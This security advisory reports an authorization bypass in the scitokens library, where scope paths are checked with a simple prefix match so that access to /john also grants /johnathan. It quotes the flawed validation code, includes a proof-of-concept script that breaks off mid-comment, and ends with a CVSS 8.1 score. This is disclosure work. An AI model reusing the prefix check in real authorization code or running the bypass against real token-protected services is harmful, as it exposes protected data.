The Enforcer incorrectly validates scope paths by using a simple prefix match (startswith). This allows a token with access to a specific path (e.g., /john) to also access sibling paths that start with the same prefix (e.g., /johnathan, /johnny), which is an Authorization Bypass.
File: src/scitokens/scitokens.py
Methods: _validate_scp and _validate_scope
In _validate_scp (around line 696):
for scope in value:
authz, norm_path = self._check_scope(scope)
if (self._test_authz == authz) and norm_requested_path.startswith(norm_path):
return True
In _validate_scope (around line 722):
for scope in value.split(" "):
authz, norm_path = self._check_scope(scope)
if (self._test_authz == authz) and norm_requested_path.startswith(norm_path):
return True
If norm_path (authorized) is /john and norm_requested_path (requested) is /johnathan, startswith returns True, incorrectly granting access.
import scitokens
import sys
def poc_scope_bypass():
"""
Demonstrate an Authorization Bypass vulnerability in scope path checking.
"""
print("--- PoC: Incorrect Scope Path Checking (Authorization Bypass) ---")
issuer = "https://scitokens.org/unittest"
enforcer = scitokens.Enforcer(issuer)
# Create a token with access to /john
token = scitokens.SciToken()
token['iss'] = issuer
token['scope'] = "read:/john"
print(f"Authorized path in scope: /john")
# 1. Test access to /john/file (should be allowed)
print(f"[1] Testing legitimate subpath: /john/file")
if enforcer.test(token, 'read', '/john/file'):
print(" -> Access GRANTED (Correct behavior)")
else:
print(" -> Access DENIED (Incorrect behavior - should have access to subpaths)")
# 2. Test access to /johnathan (SHOULD BE...
1.9.6Exploitability
AV:NAC:LPR:LUI:NScope
S:UImpact
C:HI:HA:N8.1/CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N